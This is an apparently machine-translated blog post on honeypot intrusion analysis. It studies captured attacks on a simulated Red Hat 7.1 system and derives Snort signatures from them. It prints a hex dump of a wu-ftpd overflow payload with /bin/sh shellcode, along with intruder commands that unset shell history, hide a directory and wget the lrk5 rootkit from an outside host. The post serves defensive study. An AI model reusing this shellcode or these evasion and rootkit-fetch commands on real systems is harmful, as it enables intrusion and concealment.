Honeypot advanced Hit @ me Intrusion Analysis

I recently read the PPTP documents and accidentally found that the pptp-faq on www.couterpane.com was very interesting, which roughly meant: "Microsoft's PPTP protocol is very bad, the Six vulnerabilities in the Protocol allow attackers to sniff passwords over the network, sneak into the encrypted channel, obtain trusted data, and conduct Dos attacks on PPTP. The PPTP protocol itself is very secure, but the PPTP Protocol implemented by Microsoft is a pile of garbage. Bruce Schneier and Mudge suggested using IPSec to replace Microsoft's junk goods ." The security products of the world's largest software company have such naive errors. Do we feel the happiness of security when we are in a large number of security products?

 

So we have to test. Build your own Honeypot system and implement virtual implementations of various systems and related products in it to simulate real network service resources to trap various attacks, this approach has become the best way to resolve security vulnerabilities, familiarize ourselves with intrusion techniques, and study defense policies. Therefore, intrusion data analysis seems fashionable.

 

Hit @ me ① the honeypot has been built for half a month and various attacks are tested in the experimental environment (because the intrusion behavior is a time process, in order to complete the test of the intrusion data, I invited two assistants to conduct various attack experiments on Honeypot in the experimental environment), and I collected a lot of interesting data resources. To make the analysis process interesting and vivid, I will use intrusion into different operating systems to evaluate the digital behavior of intrusion.

 

 

 

Linux intrusion digital analysis Port Scan Digital features

 

There are a large number of "IDS441/scan_probe-Synscan-Portscan" records in the output display of ACID, and its target IP address is pointing to the simulated Redhat7.1 system. From the literal meaning of the record, we can vaguely obtain that the record is probably a syn TCP port scan initiated by the system. To clearly understand its Digital features, capture several packet records:

 

5/13-17:54:10. 623674 192.168.1.244: 117-> 192.168.1.250: 117

Tcp ttl: 42 TOS: 0x0 ID: 39426

** SF *** Seq: 0x55A0EF7B Ack: 0x40F9DC84 Win: 0x404

5/13-17:54:10. 623674 192.168.1.244: 118-> 192.168.1.250: 118

Tcp ttl: 42 TOS: 0x0 ID: 39426

** SF *** Seq: 0x6E42083A Ack: 0x4F07A60B Win: 0x404

The Analysis of TCP/IP headers has some interesting phenomena:

 

1. The value of the Fragment Idnetification field in the IP header is always 39426

 

2. The source port number of TCP is always the same as that of the target address.

 

3. SYN and FIN are always set in the TCP validation number

 

4. The window size is always 0x404

 

As we all know, setting a bit of SYN in a data packet means the SYN group sent to the target port. If the SYN/ACK returned by the target is received, it is inferred that the port is in the listening status; if you receive RST/ACK, the port is not open. The FIN location package allows the target system to report an RST group to the closed port (for details, see RFC0793 ). All indications are that the system has undergone a hidden half-open scanning ).

 

Conclusion: The digital feature of SYN-FIN occurs in port scanning events. The idnumber of this scan packet is 39426, and another notable feature is that the window size is 0x404. When I reviewed the snort rule repository, the feature code is as follows:

 

Alert TCP $ EXTERNAL any-> $ INTERNAL any (msg: "IDS441/scan_probe-Synscan-Portscan"; id: 39426; flags: SF; classtype: info-attempt; reference: arachnids, 441

(Note: by analyzing the packet structure, we can easily define our intrusion detection features and add them to the snort rule repository .)

FTP remote overflow Digital features

 

Continuing to observe the convenience output provided by ACID, I found that the intrusion detection on port 21 of RH7.1 was recorded as follows: "IDS287/ftp_ftp-wuftp260-venglin-linux ". This reminds me of the wuftp vulnerability used in RH7.1 because the password or user name is too long to cause remote overflow. I absolutely believe that Securityfocus provides more than one code to exploit this vulnerability!

 

For such an overflow attack, what kind of data do we need to capture to obtain the intrusion behavior? Many common thinking modes are: intercept the long password entered by intruders. when the length of the password exceeds the specific limit, the intrusion detection will be triggered to record its behavior. However, there is a problem here: there are more than one exploit program, and the overflow password strings are also diverse. How can we define a unified digital feature for it? So I am very interested in collecting the code for server feedback after overflow, and this is definitely a wonderful idea! To confirm my ideas and analyze the vulnerability exploitation principles, the data capture package is as follows:

 

05/14-01:25:38. 420608 192.168.1.18: 1968-> 192.168.1.250: 21

Tcp TTL: 64 TOS: 0x10 ID: 31579 DF

* *** PA * Seq: 0x6BF2C954 Ack: 0xE69A711B Win: 0x7FB8

TCP Options => nop ts: 58495044 3110955

50 41 53 53 20 90 90 90 90 90 90 90 90 PASS ...........

90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 90 90 ................

90 90 90 90 90 90 90 90 90 31 C0 31 DB 31 ...... 1.1.1

C9 B0 46 CD 80 31 C0 31 DB 43 89 D9 41 B0 3F CD... F... 1.1.c..a .?.

80 EB 6B 5E 31 C0 31 C9 8D 5E 01 88 46 04 66 B9 .. k ^ 1. 1 .. ^ .. F. f.

FF 01 B0 27 CD 80 31 C0 8D 5E 01 B0 3D CD 80 ...... 1 ...... ^ ..

31 C0 31 DB 8D 5E 08 89 43 02 31 C9 FE C9 31 C0 1. 1... ^... C.1. 1.

8D 5E 08 B0 0C CD 80 FE C9 75 F3 31 C0 88 46 09. ^ ...... u.1.. F.

8D 5E 08 B0 3D CD 80 FE 0E B0 30 FE C8 88 46 04. ^... =... 0... F.

31 C0 88 46 07 89 76 08 89 46 0C 89 F3 8D 4E 08 1... F... v... F... N.

8D 56 0C B0 0B CD 80 31 C0 31 DB B0 01 CD 80 E8. V ...... 1 ......

90 FF 30 62 69 6E 30 73 68 31 2E ...... 0bin0sh1.

2E 31 31 0D 0A. 11 ..

From the intercepted FTP login packet, we found that during password verification (that is, after the PASS Command), we entered a very long password (sending the appropriate shellcode can successfully overflow wu-ftpd, such as wu-lnx.c type Program), if the server returns 31c031db 31c9b046 cd80 31c031db hexadecimal information (that is, 1.1.1 in the above table .. F .. 1. 1. and then obtain the remote system root/bin/sh.

 

Because no data offset is returned for Server Overflow Information, that is, the Dataoffset is zero, we obtain another snort Intrusion Feature rule:

 

Alert TCP $ EXTERNAL any-> $ INTERNAL 21 (msg: "IDS287/ftp_ftp-wuftp260-venglin-linux"; flags: A +; content: "| 31c031db 31c9b046 cd80 31c031db |"; classtype: system-attempt; reference: arachnids, 287

Comprehensive Intrusion digital resolution

 

Intruders obtain system control permissions through port scanning and vulnerability exploitation. What should they do next? In many movie plots, it is common to break into others' houses, hide objects in inconspicuous corners, and then marry others. Therefore, applying this kind of thinking to the Internet has become a reality!

 

Through data packet monitoring and tracking, I found that intruders were running many very interesting commands. In order to facilitate illustration of their methods, I sorted out their exquisite personal behaviors from the data packets that were pursued, add comments to the required commands:

# Unset HISTFILE; id; uname-;

Uid = 0 (root) gid = 0 (root) groups = 0 (root), 1 (bin), 2 (daemon), 3 (sys), 4 (adm ), 6 (disk), 10 (wheel)

Linux res 2.4.7-4 #1 Thu Sep 6 17:27:27 EDT 2001 i686 unknown

/* The intruders cancel the HISTFILE environment variables and the system cannot record the commands used by the intruders;

 

* Check the ID attribute and confirm that the operation is successful. The root permission is obtained;

 

*/View the controlled system environment

 

 

 

# Mkdir/var/tmp /...

# Cd/var/tmp /...

# Wget http://packetstormsecurity.org/U... its/lrk5.src.tar.gz